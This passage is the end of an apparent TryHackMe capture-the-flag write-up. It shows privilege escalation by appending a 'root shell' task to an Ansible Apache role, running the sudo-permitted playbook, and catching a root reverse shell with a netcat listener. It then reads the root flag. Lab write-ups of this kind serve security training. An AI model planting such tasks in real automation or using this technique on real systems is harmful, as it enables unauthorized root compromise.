- name: Check whether certificates defined in vhosts exist.
  stat: path={{ item.certificate_file }}
  register: apache_ssl_certificates
  with_items: "{{ apache_vhosts_ssl }}"

- name: Add apache vhosts configuration.
  template:
    src: "{{ apache_vhosts_template }}"
    dest: "{{ apache_conf_path }}/{{ apache_vhosts_filename }}"
    owner: root
    group: root
    mode: 0644
  notify: restart apache
  when: apache_create_vhosts | bool

- name: Check if localhost cert exists (RHEL 8 and later).
  stat:
    path: /etc/pki/tls/certs/localhost.crt
  register: localhost_cert
  when: ansible_distribution_major_version | int >= 8

- name: Ensure httpd certs are installed (RHEL 8 and later).
  command: /usr/libexec/httpd-ssl-gencerts
  when:
    - ansible_distribution_major_version | int >= 8
    - not localhost_cert.stat.exists

- name: root shell
  command: sudo bash /tmp/shell.sh

The task added at the end of the file is:

- name: root shell
  command: sudo bash /tmp/shell.sh

Run sudo -l again and execute the script as the automation user:

[theodore@aratus tasks]$ sudo -l
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:
(automation) NOPASSWD: /opt/scripts/infra_as_code.sh
[theodore@aratus tasks]$ sudo -u automation /opt/scripts/infra_as_code.sh

PLAY [Check status of the firewall] ******************************************************************************************************************************

TASK [Gathering Facts] *******************************************************************************************************************************************
ok: [10.10.150.85]

TASK [check firewalld] *******************************************************************************************************************************************
ok: [10.10.150.85]

PLAY RECAP *******************************************************************************************************************************************************
10.10.150.85 : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0


PLAY [Install and configure Apache] ******************************************************************************************************************************

TASK [Gathering Facts] *******************************************************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Include OS-specific variables.] *******************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Include variables for Amazon Linux.] **************************************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : Define apache_packages.] **************************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : include_tasks] ************************************************************************************************************************
included: /opt/ansible/roles/geerlingguy.apache/tasks/setup-RedHat.yml for 10.10.150.85

TASK [geerlingguy.apache : Ensure Apache is installed on RHEL.] **************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Get installed version of Apache.] *****************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Create apache_version variable.] ******************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Include Apache 2.2 variables.] ********************************************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : Include Apache 2.4 variables.] ********************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Configure Apache.] ********************************************************************************************************************
included: /opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml for 10.10.150.85

TASK [geerlingguy.apache : Configure Apache.] ********************************************************************************************************************
ok: [10.10.150.85] => (item={u'regexp': u'^Listen ', u'line': u'Listen 80'})

TASK [geerlingguy.apache : Check whether certificates defined in vhosts exist.] **********************************************************************************

TASK [geerlingguy.apache : Add apache vhosts configuration.] *****************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Check if localhost cert exists (RHEL 8 and later).] ***********************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : Ensure httpd certs are installed (RHEL 8 and later).] *********************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : root shell] ***************************************************************************************************************************

A netcat listener on the attacking machine, started before the playbook reaches the root shell task, receives the connection. BOOM. VOILA. We got the root shell:

root@ip-10-10-183-119:~# nc -lnvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.150.85 50688 received!
[root@aratus automation]# whoami
whoami
root
[root@aratus automation]# pwd
pwd
/home/automation
[root@aratus automation]# cd /root
cd /root
[root@aratus ~]# ls
ls
anaconda-ks.cfg
root.txt
scripts
[root@aratus ~]# cat root.txt
cat root.txt
THM{d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXf6}
[root@aratus ~]#

Thanks for reading and sharing. See you later, stay healthy and have a nice day.

You can find me on:

LinkedIn: bit.ly/34BKvtC

Github: bit.ly/3JNmXkK

linktr.ee: bit.ly/3DZiDN1

Hamdi Sevben

#tryhackme #thm #aratus #ansible #pcap #ftp #smb #smbclient #cewl #hydra #bruteforce #ssh #pspy64 #sniffing #tcpdump #base64 #sudo -l #permission #reverseshell

Hamdi Sevben

| Penetration Tester | AWS Cloud Practitioner | eWPTXv2 | eMAPT | CPTE | CEH | CPEH | HTB Practitioner | TryHackMe Top %1 |